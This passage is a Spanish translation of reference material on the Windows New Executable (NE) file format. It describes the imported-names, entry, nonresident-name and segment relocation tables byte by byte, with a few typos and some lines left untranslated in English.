°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°° Imported Names Table La Imported-Name Table contiene los nombres de los modulos que el file ejecuta- bles importa. Cada entrada contiene dos partes; un byte que especifica el largo de la string, y la misma string. Las strings en esta tabla no son terminadas en cero. °°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°° Entry Table La Entry Table contiene "paquetes" (bundles) de entry points al (from) el file ejecutable. (el linker genera cada paquete). El sistema de numeracion para estos valores ordinales es 1-baes, osea, el valor ordinal que corresponde al primer entry point es 1. El linker genera los paquetes mas densos posibles, dada la restriccion de que no puede reordenar los entry points. Esta restriccion es necesaria porque otros ejecutables pueden referirse a los entry points dentro de un paquete por su valor ordinal. La data de la Entry Table esta organizada por paquete, cada cual empezando con un header de 2 bytes. El primer byte del header especifica el numero de entradas en el paquete (un valor de 00 designa el fin de la tabl). El segundo byte especifica si el segmento correspondiente es movil o fijo. Si el valor de este byte es 0FFh, el segmento es movil. Si el valor en este byte es 0FEh, la entrada no se refiere a un segmento, sino a una constante definida dentro del modulo. Si el valor en este byte no es ni 0FFh ni 0FEh, es un indice de segmento. Para los segmentos moviles, cada entrada consiste de 6 bytes y tiene la siguiente forma: Offset Descripcion 00h Especifica un valor de byte. Este valor puede ser uno o mas de los siguientes bits: Bit(s) Significado 0 Si este bit esta seteado, la entrada esta exportado. 1 Si este bit esta seteado, el segmento usa un segmento de datos global (shared). 3..7 Si el file ejecutable contiene codigo que hace transiciones de anillo, este bit especifica el numero de words que componen la stack. En el momento de la transicion de anillo, estas words deben ser copiadas de la stack de un anillo a la stack del otro. 01h Especifica una instruccion int 3fh. 03h Especifica el numero de segmento. 04h Especifica el offset del segmento. Para segmentos fijos, cada entrada consiste de 3 bytes y tiene la siguiente forma: Offset Descripcion 00h Especifica un valor de bytes que es una combinacion de los siguientes bits: Bit(s) Significado 0 Si este bit esta seteado, la entrada es exportada. 1 Si este bit esta seteado, la entrada usa un segmento de datos global (shared). (Este puede ser solo seteado para modulo de libreria SINGLEDATA). 3..7 Si el file ejecutable contiene codigo que hace transiciones de anillo, estos bits especifican el numero de words que constitu- yen la stack. En el momento de la transicion de anillo, estas words deben ser copiadas de la stack de un anillo a la stack del otro. 01h Especifica un offset. °°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°° Nonresident Name Table La nonresidente-name Table contiene strings que identifican las funciones exportadas dentro del file ejecutable. Como el nombre implica, estas strings no siempre residen en la memoria del sistema, y son descartables. Las strings de los nonresident-names son case-sensitive; y no terminan en cero. La siguiente lista compendia los valores encontrados en la nonresident-name table (los offset son relativos al principio de cada entrada): Offset Descripcion 00h Especifica el largo, en bytes, de la string. Si este byte es 00h, no hay mas strings en la tabla. 01h * xxh Especifica el texto del nonresident-name. Esta string es case-sensi- tive y no null-terminated. xx + 01h Especifica un valor ordinal que es el indice dentro de la Entry Table. El primer nombre que aparece en la nonresident-name table es la string de descripcion del modulo (que fue especificada en el file de module-definition (.DEF)) °°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°° Segments Los segmentos de codigo y datos siguen al header de Windows. Algunos de los segmentos de codigo pueden contener llamadas a funciones en otros segmentos y pueden, por lo tanto, requerir datos de realocacion para resolver esas referen- cias. Estos datos de realocacion estan guardados en una tabla de realocacion que aparece inmediatamente despues del codigo o data en el segmento. Los primeros 2 bytes en esta tabla especifican el numero de relocation items que contiene la tabla. Un relocation item es una colecciond de bytes que especifi- can la siguiente informacion: o Tipo de direccion (segment only, offset only, segment and offset) o Tipo de realocacion (internal reference, imported ordinal, imported name) o Numero de segmento o identificador ordinal (para referencias inter- nas) o Reference-table index or function ordinal number (for imported ordinals) o Reference-table index or name-table offset (for imported names) Cada relocation item contiene 8 bytes de datos, y el primer especifica uno de los siguientes tipos de relocation-address. Value Meaning 0 Low byte at the specified offset 2 16-bit selector 3 32-bit pointer 5 16-bit offset 11 48-bit pointer 13 32-bit offset El segundo byte especifica uno de los siguientes tipos de realocacion: Valor Significado 0 Referencia interna. 1 Ordinal importado. 2 Nombre importado. 3 OSFIXUP. El tercer y cuarto byte especifican el offset de la realocacion dentro del segmento. Si el tipo de realocacion es un imported ordinal, el quinto y sexto byte especifican un indice a una tabla de module reference, y el septimo y octavo byte especifican el valor ordinal de la funcion. Si el tipo de realocacion es un imported name, el quinto y sexto byte especifi- can un indice a una tabla de module reference, y el septimo y octavo byte especifican un offset a una Imported Name Table. Si el tipo de realocacion es internal reference, y el segmento es fijo, el quinto byte especifica el numero de segmento, el sexto byte es cero, y el septimo y octavo byte especifican un offset dentro del segmento. Si el tipo de realocacion es internal reference y el segmento es movil, el quinto byte contiene 0FFh, el sexto byte es cero; y el septimo y octavo byte especifican un valor ordinal dentro de la Entry Table del segmento.